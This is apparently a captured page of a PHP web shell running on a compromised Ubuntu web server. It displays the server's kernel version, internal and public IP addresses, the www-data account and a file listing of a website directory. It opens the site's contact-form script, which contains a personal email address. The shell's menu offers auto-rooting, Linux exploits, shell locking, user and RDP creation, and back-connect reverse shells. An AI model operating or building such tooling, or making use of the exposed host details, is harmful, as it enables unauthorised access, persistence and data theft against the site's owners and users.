Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.155.48
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
uniclare /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-sr-x
fonts
[ DIR ]
drwxr-sr-x
img
[ DIR ]
drwxr-sr-x
js
[ DIR ]
drwxr-sr-x
Uniclare.ipa
6.09
MB
-rwxr-xr-x
index copy 2.html
32.09
KB
-rwxr-xr-x
index copy.html
32.23
KB
-rwxr-xr-x
index.html
32.55
KB
-rwxr-xr-x
indexx.html
28.29
KB
-rwxr-xr-x
package.json
296
B
-rwxr-xr-x
policy (1).html
34.28
KB
-rwxr-xr-x
policy.html
34.28
KB
-rwxr-xr-x
process.php
2.32
KB
-rwxr-xr-x
screen1.png
70.59
KB
-rwxr-xr-x
style.css
58.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : process.php
<?php // Configure your Subject Prefix and Recipient here $subjectPrefix = '[Contact Form Website]'; $emailTo = '<mehedidb@gmail.com>'; $errors = array(); // array to hold validation errors $data = array(); // array to pass back data if($_SERVER['REQUEST_METHOD'] === 'POST') { $name = stripslashes(trim($_POST['name'])); $email = stripslashes(trim($_POST['email'])); $phone = stripslashes(trim($_POST['phone'])); $message = stripslashes(trim($_POST['message'])); if (empty($name)) { $errors['name'] = 'Name is required.'; } if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { $errors['email'] = 'Email is invalid.'; } if (empty($phone)) { $errors['phone'] = 'Phone is required.'; } if (empty($message)) { $errors['message'] = 'Message is required.'; } // if there are any errors in our errors array, return a success boolean or false if (!empty($errors)) { $data['success'] = false; $data['errors'] = $errors; } else { $subject = "$subjectPrefix $subject"; $body = ' <strong>Name: </strong>'.$name.'<br /> <strong>Email: </strong>'.$email.'<br /> <strong>Phone: </strong>'.$phone.'<br /> <strong>Message: </strong>'.nl2br($message).'<br /> '; $headers = "MIME-Version: 1.1" . PHP_EOL; $headers .= "Content-type: text/html; charset=utf-8" . PHP_EOL; $headers .= "Content-Transfer-Encoding: 8bit" . PHP_EOL; $headers .= "Date: " . date('r', $_SERVER['REQUEST_TIME']) . PHP_EOL; $headers .= "Message-ID: <" . $_SERVER['REQUEST_TIME'] . md5($_SERVER['REQUEST_TIME']) . '@' . $_SERVER['SERVER_NAME'] . '>' . PHP_EOL; $headers .= "From: " . "=?UTF-8?B?".base64_encode($name)."?=" . "<$email>" . PHP_EOL; $headers .= "Return-Path: $emailTo" . PHP_EOL; $headers .= "Reply-To: $email" . PHP_EOL; $headers .= "X-Mailer: PHP/". phpversion() . PHP_EOL; $headers .= "X-Originating-IP: " . $_SERVER['SERVER_ADDR'] . PHP_EOL; mail($emailTo, "=?utf-8?B?" . base64_encode($subject) . "?=", $body, $headers); $data['success'] = true; $data['message'] = 'Congratulations. Your message has been sent successfully'; } // return all our data to an AJAX call echo json_encode($data); }
Close